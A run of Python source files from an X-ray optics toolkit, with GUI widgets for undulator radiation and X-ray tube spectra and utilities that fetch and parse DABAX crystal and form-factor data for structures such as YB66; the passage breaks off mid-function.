    def set_fields_from_h5file(self, file_h5, subtitle):
        hf = h5py.File(file_h5, 'r')

        self.METHOD = hf[subtitle + "/parameters/METHOD"].value
        self.USEEMITTANCES = hf[subtitle + "/parameters/USEEMITTANCES"].value
        self.ELECTRONENERGY = hf[subtitle + "/parameters/ELECTRONENERGY"].value
        self.ELECTRONENERGYSPREAD = hf[subtitle + "/parameters/ELECTRONENERGYSPREAD"].value
        self.ELECTRONCURRENT = hf[subtitle + "/parameters/ELECTRONCURRENT"].value
        self.ELECTRONBEAMSIZEH = hf[subtitle + "/parameters/ELECTRONBEAMSIZEH"].value
        self.ELECTRONBEAMSIZEV = hf[subtitle + "/parameters/ELECTRONBEAMSIZEV"].value
        self.ELECTRONBEAMDIVERGENCEH = hf[subtitle + "/parameters/ELECTRONBEAMDIVERGENCEH"].value
        self.ELECTRONBEAMDIVERGENCEV = hf[subtitle + "/parameters/ELECTRONBEAMDIVERGENCEV"].value
        self.PERIODID = hf[subtitle + "/parameters/PERIODID"].value
        self.NPERIODS = hf[subtitle + "/parameters/NPERIODS"].value
        self.KV = hf[subtitle + "/parameters/KV"].value
        self.KH = hf[subtitle + "/parameters/KH"].value
        self.KPHASE = hf[subtitle + "/parameters/KPHASE"].value
        self.DISTANCE = hf[subtitle + "/parameters/DISTANCE"].value
        self.SETRESONANCE = hf[subtitle + "/parameters/SETRESONANCE"].value
        self.HARMONICNUMBER = hf[subtitle + "/parameters/HARMONICNUMBER"].value
        self.GAPH = hf[subtitle +
"/parameters/GAPH"].value self.GAPV = hf[subtitle + "/parameters/GAPV"].value self.HSLITPOINTS = hf[subtitle + "/parameters/HSLITPOINTS"].value self.VSLITPOINTS = hf[subtitle + "/parameters/VSLITPOINTS"].value self.PHOTONENERGYMIN = hf[subtitle + "/parameters/PHOTONENERGYMIN"].value self.PHOTONENERGYMAX = hf[subtitle + "/parameters/PHOTONENERGYMAX"].value self.PHOTONENERGYPOINTS = hf[subtitle + "/parameters/PHOTONENERGYPOINTS"].value hf.close() def unitLabels(self): return ["Use emittances","Electron Energy [GeV]", "Electron Energy Spread", "Electron Current [A]", "Electron Beam Size H [m]", "Electron Beam Size V [m]","Electron Beam Divergence H [rad]", "Electron Beam Divergence V [rad]", "Period ID [m]", "Number of periods","Kv [K value vertical field]", "Kh [K value horizontal field]","Kphase [phase diff Kh - Kv in rad]", "Distance to slit [m]", "Set photon energy and slit","Harmonic number", "Slit gap H [m]", "Slit gap V [m]", "Number of slit mesh points in H", "Number of slit mesh points in V", "Photon Energy Min [eV]","Photon Energy Max [eV]","Number of Photon Energy Points", "calculation code","hdf5 file"] # TODO check energy spread flag: set to False (not used at all)!! def unitFlags(self): return ["True", "True", "False", "True", "self.USEEMITTANCES == 1", "self.USEEMITTANCES == 1","self.USEEMITTANCES == 1", "self.USEEMITTANCES == 1", "True", "True", "True", "self.METHOD != 3","self.METHOD != 3", "True", "True", "self.SETRESONANCE > 0", "self.SETRESONANCE == 0", "self.SETRESONANCE == 0", "True", "True", "self.SETRESONANCE == 0", "self.SETRESONANCE == 0","self.SETRESONANCE == 0", "True","True"] def get_help_name(self): return 'undulator_radiation' def check_fields(self): self.ELECTRONENERGY = congruence.checkStrictlyPositiveNumber(self.ELECTRONENERGY, "Electron Energy") if not self.METHOD == 1: self.ELECTRONENERGYSPREAD = congruence.checkPositiveNumber(self.ELECTRONENERGYSPREAD, "Electron Energy Spread") self.ELECTRONCURRENT = congruence.checkStrictlyPositiveNumber(self.ELECTRONCURRENT, "Electron Current") self.ELECTRONBEAMSIZEH = congruence.checkPositiveNumber(self.ELECTRONBEAMSIZEH, "Electron Beam Size H") self.ELECTRONBEAMSIZEV = congruence.checkPositiveNumber(self.ELECTRONBEAMSIZEV, "Electron Beam Size V") self.ELECTRONBEAMDIVERGENCEH = congruence.checkNumber(self.ELECTRONBEAMDIVERGENCEH, "Electron Beam Divergence H") self.ELECTRONBEAMDIVERGENCEV = congruence.checkNumber(self.ELECTRONBEAMDIVERGENCEV, "Electron Beam Divergence V") self.PERIODID = congruence.checkStrictlyPositiveNumber(self.PERIODID, "Period ID") self.NPERIODS = congruence.checkStrictlyPositiveNumber(self.NPERIODS, "Number of Periods") self.KV = congruence.checkPositiveNumber(self.KV, "Kv") self.KH = congruence.checkPositiveNumber(self.KH, "Kh") self.KPHASE = congruence.checkNumber(self.KPHASE, "KPHASE") self.DISTANCE = congruence.checkStrictlyPositiveNumber(self.DISTANCE, "Distance to slit") if self.SETRESONANCE == 0: self.GAPH = congruence.checkPositiveNumber(self.GAPH, "Slit gap H") self.GAPV = congruence.checkPositiveNumber(self.GAPV, "Slit gap V") self.PHOTONENERGYMIN = congruence.checkNumber(self.PHOTONENERGYMIN, "Photon Energy Min") self.PHOTONENERGYMAX = congruence.checkNumber(self.PHOTONENERGYMAX, "Photon Energy Max") congruence.checkGreaterOrEqualThan(self.PHOTONENERGYPOINTS, 2, "Number of Photon Energy Points", " 2") else: self.HARMONICNUMBER = congruence.checkStrictlyPositiveNumber(self.HARMONICNUMBER, "Harmonic number") self.HSLITPOINTS = congruence.checkStrictlyPositiveNumber(self.HSLITPOINTS, 
"Number of slit mesh points in H") self.VSLITPOINTS = congruence.checkStrictlyPositiveNumber(self.VSLITPOINTS, "Number of slit mesh points in V") if self.METHOD == 1: # URGENT congruence.checkLessOrEqualThan(self.HSLITPOINTS, 51, "Number of slit mesh points for URGENT "," 51") congruence.checkLessOrEqualThan(self.VSLITPOINTS, 51, "Number of slit mesh points for URGENT "," 51") def plot_results(self, calculated_data, progressBarValue=80): if not self.view_type == 0: if not calculated_data is None: self.initializeTabs() # added by srio to avoid overlapping graphs self.view_type_combo.setEnabled(False) p,e,h,v = calculated_data.get_content("xoppy_data") code = calculated_data.get_content("xoppy_code") try: self.plot_data3D(p, e, h, v, 0, 0, xtitle='H [mm]', ytitle='V [mm]', title='Code '+code+'; Flux [photons/s/0.1%bw/mm^2]',) self.tabs.setCurrentIndex(0) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) try: if len(e) > 1: energy_step = e[1]-e[0] else: energy_step = 1.0 self.plot_data2D(p.sum(axis=0)*energy_step*codata.e*1e3, h, v, 1, 0, xtitle='H [mm]', ytitle='V [mm]', title='Code '+code+'; Power density [W/mm^2]',) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) try: print("\nResult arrays (shapes): ",e.shape,h.shape,v.shape,p.shape) self.plot_data1D(e,p.sum(axis=2).sum(axis=1)*(h[1]-h[0])*(v[1]-v[0]), 2, 0, xtitle='Photon Energy [eV]', ytitle= 'Flux [photons/s/0.1%bw]', title='Code '+code+'; Flux',) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) try: print("\nResult arrays (shapes): ",e.shape,h.shape,v.shape,p.shape) self.plot_data1D(e,p.sum(axis=2).sum(axis=1)*(h[1]-h[0])*(v[1]-v[0])*codata.e*1e3, 3, 0, xtitle='Photon Energy [eV]', ytitle= 'Spectral power [W/eV]', title='Code '+code+'; Spectral power',) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) self.view_type_combo.setEnabled(True) else: raise Exception("Empty Data") def do_xoppy_calculation(self): if self.H5_FILE_DUMP == 0: h5_file = "" else: h5_file = "undulator_radiation.h5" dict_parameters = { "ELECTRONENERGY" : self.ELECTRONENERGY, "ELECTRONENERGYSPREAD" : self.ELECTRONENERGYSPREAD, "ELECTRONCURRENT" : self.ELECTRONCURRENT, "ELECTRONBEAMSIZEH" : self.ELECTRONBEAMSIZEH, "ELECTRONBEAMSIZEV" : self.ELECTRONBEAMSIZEV, "ELECTRONBEAMDIVERGENCEH": self.ELECTRONBEAMDIVERGENCEH, "ELECTRONBEAMDIVERGENCEV": self.ELECTRONBEAMDIVERGENCEV, "PERIODID" : self.PERIODID, "NPERIODS" : self.NPERIODS, "KV" : self.KV, "KH" : self.KH, "KPHASE" : self.KPHASE, "DISTANCE" : self.DISTANCE, "SETRESONANCE" : self.SETRESONANCE, "HARMONICNUMBER" : self.HARMONICNUMBER, "GAPH" : self.GAPH, "GAPV" : self.GAPV, "HSLITPOINTS" : self.HSLITPOINTS, "VSLITPOINTS" : self.VSLITPOINTS, "METHOD" : self.METHOD, "PHOTONENERGYMIN" : self.PHOTONENERGYMIN, "PHOTONENERGYMAX" : self.PHOTONENERGYMAX, "PHOTONENERGYPOINTS" : self.PHOTONENERGYPOINTS, "USEEMITTANCES" : self.USEEMITTANCES, } # write python script self.xoppy_script.set_code(self.script_template().format_map(dict_parameters)) return xoppy_calc_undulator_radiation( ELECTRONENERGY = self.ELECTRONENERGY, ELECTRONENERGYSPREAD = self.ELECTRONENERGYSPREAD, ELECTRONCURRENT = self.ELECTRONCURRENT, ELECTRONBEAMSIZEH = self.ELECTRONBEAMSIZEH, ELECTRONBEAMSIZEV = self.ELECTRONBEAMSIZEV, ELECTRONBEAMDIVERGENCEH = 
self.ELECTRONBEAMDIVERGENCEH, ELECTRONBEAMDIVERGENCEV = self.ELECTRONBEAMDIVERGENCEV, PERIODID = self.PERIODID, NPERIODS = self.NPERIODS, KV = self.KV, KH = self.KH, KPHASE = self.KPHASE, DISTANCE = self.DISTANCE, SETRESONANCE = self.SETRESONANCE, HARMONICNUMBER = self.HARMONICNUMBER, GAPH = self.GAPH, GAPV = self.GAPV, HSLITPOINTS = self.HSLITPOINTS, VSLITPOINTS = self.VSLITPOINTS, METHOD = self.METHOD, PHOTONENERGYMIN = self.PHOTONENERGYMIN, PHOTONENERGYMAX = self.PHOTONENERGYMAX, PHOTONENERGYPOINTS = self.PHOTONENERGYPOINTS, USEEMITTANCES = self.USEEMITTANCES, h5_file = h5_file, h5_entry_name = "XOPPY_RADIATION", h5_initialize = True, h5_parameters = dict_parameters, ) def script_template(self): return """ # # script to make the calculations (created by XOPPY:undulator_radiation) # from orangecontrib.xoppy.util.xoppy_undulators import xoppy_calc_undulator_radiation h5_parameters = dict() h5_parameters["ELECTRONENERGY"] = {ELECTRONENERGY} h5_parameters["ELECTRONENERGYSPREAD"] = {ELECTRONENERGYSPREAD} h5_parameters["ELECTRONCURRENT"] = {ELECTRONCURRENT} h5_parameters["ELECTRONBEAMSIZEH"] = {ELECTRONBEAMSIZEH} h5_parameters["ELECTRONBEAMSIZEV"] = {ELECTRONBEAMSIZEV} h5_parameters["ELECTRONBEAMDIVERGENCEH"] = {ELECTRONBEAMDIVERGENCEH} h5_parameters["ELECTRONBEAMDIVERGENCEV"] = {ELECTRONBEAMDIVERGENCEV} h5_parameters["PERIODID"] = {PERIODID} h5_parameters["NPERIODS"] = {NPERIODS} h5_parameters["KV"] = {KV} h5_parameters["KH"] = {KH} h5_parameters["KPHASE"] = {KPHASE} h5_parameters["DISTANCE"] = {DISTANCE} h5_parameters["SETRESONANCE"] = {SETRESONANCE} h5_parameters["HARMONICNUMBER"] = {HARMONICNUMBER} h5_parameters["GAPH"] = {GAPH} h5_parameters["GAPV"] = {GAPV} h5_parameters["HSLITPOINTS"] = {HSLITPOINTS} h5_parameters["VSLITPOINTS"] = {VSLITPOINTS} h5_parameters["METHOD"] = {METHOD} h5_parameters["PHOTONENERGYMIN"] = {PHOTONENERGYMIN} h5_parameters["PHOTONENERGYMAX"] = {PHOTONENERGYMAX} h5_parameters["PHOTONENERGYPOINTS"] = {PHOTONENERGYPOINTS} h5_parameters["USEEMITTANCES"] = {USEEMITTANCES} e, h, v, p, code = xoppy_calc_undulator_radiation( ELECTRONENERGY = h5_parameters["ELECTRONENERGY"] , ELECTRONENERGYSPREAD = h5_parameters["ELECTRONENERGYSPREAD"] , ELECTRONCURRENT = h5_parameters["ELECTRONCURRENT"] , ELECTRONBEAMSIZEH = h5_parameters["ELECTRONBEAMSIZEH"] , ELECTRONBEAMSIZEV = h5_parameters["ELECTRONBEAMSIZEV"] , ELECTRONBEAMDIVERGENCEH = h5_parameters["ELECTRONBEAMDIVERGENCEH"], ELECTRONBEAMDIVERGENCEV = h5_parameters["ELECTRONBEAMDIVERGENCEV"], PERIODID = h5_parameters["PERIODID"] , NPERIODS = h5_parameters["NPERIODS"] , KV = h5_parameters["KV"] , KH = h5_parameters["KH"] , KPHASE = h5_parameters["KPHASE"] , DISTANCE = h5_parameters["DISTANCE"] , SETRESONANCE = h5_parameters["SETRESONANCE"] , HARMONICNUMBER = h5_parameters["HARMONICNUMBER"] , GAPH = h5_parameters["GAPH"] , GAPV = h5_parameters["GAPV"] , HSLITPOINTS = h5_parameters["HSLITPOINTS"] , VSLITPOINTS = h5_parameters["VSLITPOINTS"] , METHOD = h5_parameters["METHOD"] , PHOTONENERGYMIN = h5_parameters["PHOTONENERGYMIN"] , PHOTONENERGYMAX = h5_parameters["PHOTONENERGYMAX"] , PHOTONENERGYPOINTS = h5_parameters["PHOTONENERGYPOINTS"] , USEEMITTANCES = h5_parameters["USEEMITTANCES"] , h5_file = "undulator_radiation.h5", h5_entry_name = "XOPPY_RADIATION", h5_initialize = True, h5_parameters = h5_parameters, ) # example plot from srxraylib.plot.gol import plot_image plot_image(p[0],h,v,title="Flux [photons/s] per 0.1 bw per mm2 at %9.3f eV"%({PHOTONENERGYMIN}),xtitle="H [mm]",ytitle="V [mm]") # # end script # """ def 
extract_data_from_xoppy_output(self, calculation_output): e, h, v, p, code = calculation_output calculated_data = DataExchangeObject("XOPPY", self.get_data_exchange_widget_name()) calculated_data.add_content("xoppy_data", [p, e, h, v]) calculated_data.add_content("xoppy_code", code) return calculated_data def get_data_exchange_widget_name(self): return "UNDULATOR_RADIATION" def getTitles(self): return ['Undulator Flux vs E,X,Y','Undulator Power Density vs X,Y','Undulator Flux vs E','Undulator Spectral Power vs E'] def receive_syned_data(self, data): if isinstance(data, synedb.Beamline): if not data._light_source is None and isinstance(data._light_source._magnetic_structure, synedid.InsertionDevice): light_source = data._light_source self.ELECTRONENERGY = light_source._electron_beam._energy_in_GeV self.ELECTRONENERGYSPREAD = light_source._electron_beam._energy_spread self.ELECTRONCURRENT = light_source._electron_beam._current x, xp, y, yp = light_source._electron_beam.get_sigmas_all() self.ELECTRONBEAMSIZEH = x self.ELECTRONBEAMSIZEV = y self.ELECTRONBEAMDIVERGENCEH = xp self.ELECTRONBEAMDIVERGENCEV = yp self.PERIODID = light_source._magnetic_structure._period_length self.NPERIODS = light_source._magnetic_structure._number_of_periods self.KV = light_source._magnetic_structure._K_vertical self.KH = light_source._magnetic_structure._K_horizontal # TODO: self.KPHASE = ... define and import it in SYNED self.set_enabled(False) else: self.set_enabled(True) # raise ValueError("Syned data not correct") else: self.set_enabled(True) # raise ValueError("Syned data not correct") def set_enabled(self,value): if value == True: self.id_ELECTRONENERGY.setEnabled(True) self.id_ELECTRONENERGYSPREAD.setEnabled(True) self.id_ELECTRONBEAMSIZEH.setEnabled(True) self.id_ELECTRONBEAMSIZEV.setEnabled(True) self.id_ELECTRONBEAMDIVERGENCEH.setEnabled(True) self.id_ELECTRONBEAMDIVERGENCEV.setEnabled(True) self.id_ELECTRONCURRENT.setEnabled(True) self.id_PERIODID.setEnabled(True) self.id_NPERIODS.setEnabled(True) self.id_KV.setEnabled(True) self.id_KH.setEnabled(True) else: self.id_ELECTRONENERGY.setEnabled(False) self.id_ELECTRONENERGYSPREAD.setEnabled(False) self.id_ELECTRONBEAMSIZEH.setEnabled(False) self.id_ELECTRONBEAMSIZEV.setEnabled(False) self.id_ELECTRONBEAMDIVERGENCEH.setEnabled(False) self.id_ELECTRONBEAMDIVERGENCEV.setEnabled(False) self.id_ELECTRONCURRENT.setEnabled(False) self.id_PERIODID.setEnabled(False) self.id_NPERIODS.setEnabled(False) self.id_KV.setEnabled(False) self.id_KH.setEnabled(False) if __name__ == "__main__": bl = None LOAD_REMOTE_BEAMLINE = False if LOAD_REMOTE_BEAMLINE: try: from syned.util.json_tools import load_from_json_file, load_from_json_url from syned.storage_ring.light_source import LightSource from syned.beamline.beamline import Beamline remote_file_name = "http://ftp.esrf.eu/pub/scisoft/syned/lightsources/ESRF_ID21_EBS_ppu42_17.json" remote_file_name = "http://ftp.esrf.eu/pub/scisoft/syned/lightsources/ESRF_ID21_LowBeta_ppu42_17.json" tmp = load_from_json_url(remote_file_name) if isinstance(tmp,LightSource): bl = Beamline(tmp) except: pass app = QApplication(sys.argv) w = OWundulator_radiation() if bl is not None: w.receive_syned_data(bl) w.show() app.exec() w.saveSettings() ``` #### File: widgets/source/xtubes.py ```python import sys, os import platform from PyQt5.QtWidgets import QApplication from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import gui as oasysgui, congruence from orangecontrib.xoppy.util.xoppy_util import locations from 
orangecontrib.xoppy.widgets.gui.ow_xoppy_widget import XoppyWidget class OWxtubes(XoppyWidget): name = "Tubes" id = "orange.widgets.dataxtubes" description = "X-ray tube Spectrum (Mo,Rh,W)" icon = "icons/xoppy_xtubes.png" priority = 15 category = "" keywords = ["xoppy", "xtubes"] ITUBE = Setting(0) VOLTAGE = Setting(30.0) def build_gui(self): box = oasysgui.widgetBox(self.controlArea, self.name + " Input Parameters",orientation="vertical", width=self.CONTROL_AREA_WIDTH-5) idx = -1 #widget index 0 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "ITUBE", label=self.unitLabels()[idx], addSpace=False, items=['Mo', 'Rh', 'W'], valueType=int, orientation="horizontal", labelWidth=330) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "VOLTAGE", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) def unitLabels(self): return ['Target element ','Voltage [kV] (18<V<42)'] def unitFlags(self): return ['True','True'] def get_help_name(self): return 'xtubes' def check_fields(self): if self.VOLTAGE <= 18 or self.VOLTAGE >= 42: raise Exception("Voltage out of range") def do_xoppy_calculation(self): return xoppy_calc_xtubes(ITUBE=self.ITUBE,VOLTAGE=self.VOLTAGE) def get_data_exchange_widget_name(self): return "XTUBES" def getTitles(self): return ['X-Ray Tube Spectrum'] def getXTitles(self): return ["Energy [eV]"] def getYTitles(self): return ["Fluence [photons/s/mm^2/0.5keV(bw)/mA]"] # -------------------------------------------------------------------------------------------- # -------------------------------------------------------------------------------------------- def xoppy_calc_xtubes(ITUBE=0,VOLTAGE=30.0): print("Inside xoppy_calc_xtubes. ") for file in ["xtubes_tmp.dat"]: try: os.remove(os.path.join(locations.home_bin_run(),file)) except: pass try: with open("xoppy.inp","wt") as f: f.write("%d\n%f\n"%(ITUBE+1,VOLTAGE)) if platform.system() == "Windows": command = "\"" + os.path.join(locations.home_bin(),'xtubes.exe\" < xoppy.inp') else: command = "'" + os.path.join(locations.home_bin(), "xtubes") + "' < xoppy.inp" print("Running command '%s' in directory: %s "%(command, locations.home_bin_run())) print("\n--------------------------------------------------------\n") os.system(command) print("\n--------------------------------------------------------\n") return os.path.join(locations.home_bin_run(), "xtubes_tmp.dat") except Exception as e: raise e if __name__ == "__main__": app = QApplication(sys.argv) w = OWxtubes() w.show() app.exec() w.saveSettings() ```
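The xtubes widget above delegates the physics to a precompiled `xtubes` binary, driving it through a two-line `xoppy.inp` file and returning the path of the `xtubes_tmp.dat` it writes. A minimal standalone sketch of the same round trip follows; the import path and the two-column (energy, fluence) layout of the output file are assumptions for illustration, not guaranteed by the source above:

```python
# Hypothetical standalone driver: run xoppy_calc_xtubes for a W anode at 35 kV
# and load the spectrum it writes. The import path and the two-column layout
# of xtubes_tmp.dat are assumptions, not taken from the code above.
import numpy

from orangecontrib.xoppy.widgets.source.xtubes import xoppy_calc_xtubes

out_file = xoppy_calc_xtubes(ITUBE=2, VOLTAGE=35.0)  # ITUBE index 2 -> 'W'
data = numpy.loadtxt(out_file)
energy_eV, fluence = data[:, 0], data[:, 1]
print("%d spectrum points between %g and %g eV" % (energy_eV.size, energy_eV[0], energy_eV[-1]))
```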
{ "source": "91902078/yb66", "score": 3 }
#### File: yb66/backup/SymbolToFromAtomicNumber.py
```python
def SymbolToFromAtomicNumber(ATOM):
    # maps Z <-> chemical symbol: pass an int to get the symbol,
    # or a symbol string to get the atomic number
    atoms = [ [1,"H"],[2,"He"],[3,"Li"],[4,"Be"],[5,"B"],[6,"C"],[7,"N"],[8,"O"],[9,"F"],[10,"Ne"], \
              [11,"Na"],[12,"Mg"],[13,"Al"],[14,"Si"],[15,"P"],[16,"S"],[17,"Cl"],[18,"Ar"],[19,"K"],[20,"Ca"], \
              [21,"Sc"],[22,"Ti"],[23,"V"],[24,"Cr"],[25,"Mn"],[26,"Fe"],[27,"Co"],[28,"Ni"],[29,"Cu"],[30,"Zn"], \
              [31,"Ga"],[32,"Ge"],[33,"As"],[34,"Se"],[35,"Br"],[36,"Kr"],[37,"Rb"],[38,"Sr"],[39,"Y"],[40,"Zr"], \
              [41,"Nb"],[42,"Mo"],[43,"Tc"],[44,"Ru"],[45,"Rh"],[46,"Pd"],[47,"Ag"],[48,"Cd"],[49,"In"],[50,"Sn"], \
              [51,"Sb"],[52,"Te"],[53,"I"],[54,"Xe"],[55,"Cs"],[56,"Ba"],[57,"La"],[58,"Ce"],[59,"Pr"],[60,"Nd"], \
              [61,"Pm"],[62,"Sm"],[63,"Eu"],[64,"Gd"],[65,"Tb"],[66,"Dy"],[67,"Ho"],[68,"Er"],[69,"Tm"],[70,"Yb"], \
              [71,"Lu"],[72,"Hf"],[73,"Ta"],[74,"W"],[75,"Re"],[76,"Os"],[77,"Ir"],[78,"Pt"],[79,"Au"],[80,"Hg"], \
              [81,"Tl"],[82,"Pb"],[83,"Bi"],[84,"Po"],[85,"At"],[86,"Rn"],[87,"Fr"],[88,"Ra"],[89,"Ac"],[90,"Th"], \
              [91,"Pa"],[92,"U"],[93,"Np"],[94,"Pu"],[95,"Am"],[96,"Cm"],[97,"Bk"],[98,"Cf"],[99,"Es"],[100,"Fm"], \
              [101,"Md"],[102,"No"],[103,"Lr"],[104,"Rf"],[105,"Db"],[106,"Sg"],[107,"Bh"] ]

    if isinstance(ATOM, int):
        for a in atoms:
            if a[0] == ATOM:
                return a[1]
    for a in atoms:
        if a[1] == ATOM:
            return int(a[0])
    raise Exception("SymbolToFromAtomicNumber: could not match atom: %s" % repr(ATOM))
```
#### File: yb66/yb66/dabax_util.py
```python
import os
import numpy
from urllib.request import urlretrieve
from silx.io.specfile import SpecFile
from orangecontrib.xoppy.util.xoppy_xraylib_util import bragg_metrictensor, interface_reflectivity
from scipy.optimize import curve_fit
import scipy.constants as codata

# global default dabax_repository
dabax_repository = "http://ftp.esrf.eu/pub/scisoft/DabaxFiles/"


#########################
# common access tools
#########################
def get_dabax_file(filename, dabax_repository=dabax_repository, verbose=True):
    #
    # file exists in current directory
    #
    if os.path.exists(filename):
        if verbose:
            print("Dabax file exists in local directory: %s " % filename)
        return filename

    #
    # download remote file
    #
    if dabax_repository[0:3] == "htt" or dabax_repository[0:3] == "ftp":
        try:
            filepath, http_msg = urlretrieve(dabax_repository + filename,
                                             filename=filename,
                                             reporthook=None,
                                             data=None)
            if verbose:
                print("Dabax file %s downloaded from %s" % (filepath, dabax_repository + filename))
            return filename
        except:
            raise Exception("Failed to download file %s from %s" % (filename, dabax_repository))

    #
    # file exists in local repository
    #
    f1 = os.path.join(dabax_repository, filename)
    if os.path.exists(f1):
        if verbose:
            print("Dabax file exists in local directory: %s " % f1)
        return f1

    raise FileNotFoundError("File %s not found locally nor in the repository %s" % (filename, dabax_repository))


#########################
# crystal
#########################
def Crystal_GetCrystal(entry_name='YB66', filename='Crystals.dat',
                       dabax_repository=dabax_repository, verbose=True):
    """
    parse a complex crystal structure file into a dictionary (like
    xraylib.Crystal_GetCrystal('Si')); it has an additional field for
    each atom: the charge

    return a dictionary containing crystal information
    """
    file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose)

    sf = SpecFile(file1)

    flag_found = False

    for index in range(len(sf)):
        s1 = sf[index]
        name = s1.scan_header_dict["S"]
        if name.split(' ')[1] == entry_name:
            flag_found = True
            index_found = index

    if not flag_found:
        raise Exception("Entry name not found: %s" % entry_name)

    cryst = {'name': entry_name}  # returned dictionary like that one created by
xraylib.Crystal_GetCrystal(descriptor) cell_parameters = sf[index_found].scan_header_dict["UCELL"] cell_parameters = ' '.join(cell_parameters.split()) # remove multiple blanks a = cell_parameters.split(' ') cryst['a'] = float(a[0]) cryst['b'] = float(a[1]) cryst['c'] = float(a[2]) cryst['alpha'] = float(a[3]) cryst['beta'] = float(a[4]) cryst['gamma'] = float(a[5]) volume = bragg_metrictensor(float(a[0]), float(a[1]), float(a[2]), float(a[3]), float(a[4]), float(a[5]), RETURN_VOLUME=1) cryst['volume'] = volume cell_data = numpy.array(sf[index_found].data) cryst['n_atom'] = cell_data.shape[1] atom = [] for i in range(cell_data.shape[1]): if cell_data.shape[0] == 5: # standard 5 columns # the symbol is not set here: this info is not in the dabax file # s = symbol_to_from_atomic_number(int(cell_data[0,i])) atom.append({ 'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i], 'charge': 0.0,}) else: # 6 columns (charge) # 'AtomicName' would be required to be compatible with my current code # s = symbol_to_from_atomic_number(int(cell_data[0,i])) # if cell_data[5, i] != 0: #charged # s = s + f'%+.6g'%cell_data[5, i] atom.append({ # 'AtomicName': s, 'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i], 'charge': cell_data[5, i],}) cryst['atom'] = atom cryst['cpointer'] = None ANISO_KEY = "UANISO_COFF" #prefix for a line with anisotropic coefficients d = sf[index_found].scan_header_dict AnisoItem = {'Name': ' ', 'start': 0, 'end': 0, 'beta11': 0.0, 'beta22': 0.0, 'beta33': 0.0, 'beta12': 0.0, 'beta13': 0.0, 'beta23': 0.0} a=[ (x, d[x].split()) for x in d if x[:len(ANISO_KEY)] == ANISO_KEY] if len(a) >0: #found anisotropic coefficients in the header, process them a=sorted(a,key=lambda x:int(x[1][0]),reverse=False) #sort by 'start' ascending, to avoid the order being changed by the SpecFile n = 0 Aniso = [] for x in a: #tuple('UANISO_COFF_B1',[1 96 0.00038 0.00044 0.00039 0 0 0]) AnisoItem['Name']= x[0][len(ANISO_KEY)+1:] #site atom name ('B1', etc.): the key text after the prefix AnisoItem['start']= int(x[1][0]) AnisoItem['end']= int(x[1][1]) AnisoItem['beta11']= float(x[1][2]) AnisoItem['beta22']= float(x[1][3]) AnisoItem['beta33']= float(x[1][4]) AnisoItem['beta12']= float(x[1][5]) AnisoItem['beta13']= float(x[1][6]) AnisoItem['beta23']= float(x[1][7]) Aniso.append(AnisoItem.copy()) n = n + 1 cryst['Aniso'] = Aniso #the 'Aniso' key carries data only when anisotropic coefficients are present cryst['n_aniso']= n else: #create a dummy Aniso to stay compatible with xraylib cryst['Aniso'] = [AnisoItem.copy()] cryst['n_aniso']= 1 return cryst def Crystal_GetCrystalsList(dabax_repository=dabax_repository, verbose=True): """ get crystal names from Crystals.dat """ file1 = get_dabax_file('Crystals.dat', dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) crystals = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] crystals.append(name.split(' ')[1]) return crystals # # dabax crystal functions with the same interface as xraylib # # # # TODO: # F_0 = xraylib.Crystal_F_H_StructureFactor(_crystal, E_keV, h, k, l, _debyeWaller, 1.0) # # F_H = xraylib.Crystal_F_H_StructureFactor(_crystal, E_keV, h, k, l, _debyeWaller, 1.0) # def Crystal_dSpacing(cryst, h, k, l): return bragg_metrictensor(cryst['a'], cryst['b'], cryst['c'], cryst['alpha'], cryst['beta'], cryst['gamma'], HKL=[h, k, l]) def Bragg_angle(cryst, E_keV, h, k, l): dspacing = Crystal_dSpacing(cryst, h, k, l) # in A wavelength = codata.h *
codata.c / codata.e / (E_keV * 1e3) * 1e10 # in A return numpy.arcsin(wavelength / 2 / dspacing) ######################### # f0 ######################### def get_f0_coeffs_from_dabax_file(entry_name="Y3+", filename="f0_InterTables.dat", dabax_repository=dabax_repository, verbose=True): file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] if name.split(' ')[1] == entry_name: flag_found = True index_found = index if flag_found: return (sf[index_found].data)[:,0] else: return [] def f0_with_fractional_charge(Z, charge=0.0, filename="f0_InterTables.dat", dabax_repository=dabax_repository, verbose=True): symbol = atomic_symbols_dabax()[Z] if charge == 0.0: return get_f0_coeffs_from_dabax_file(entry_name=symbol, filename=filename, dabax_repository=dabax_repository) else: # retrieve all entries filename = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(filename) entries = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] entries.append(name.split(' ')[1]) # identify the entries that match the symbol interesting_entries = [] charge_list = [] index_list = [] for i,entry in enumerate(entries): if entry.find(symbol) == 0: if entry == symbol: interesting_entries.append(entry) charge_list.append(0.0) index_list.append(i) else: entry2 = entry.replace(symbol,'') try: charge_item = int(entry2[::-1]) # convert the reversed string (e.g. '3+' -> '+3') to an integer charge_list.append(charge_item) interesting_entries.append(entry) index_list.append(i) except: pass # retrieve coefficients from these interesting entries coefficient_list = [] for i in index_list: coefficient_list.append((sf[i].data)[:, 0]) return __f0_interpolate_coefficients(charge, interesting_entries, charge_list, coefficient_list, verbose=verbose) def calculate_f0_from_f0coeff(f0coeff, ratio): icentral = len(f0coeff) // 2 F0 = 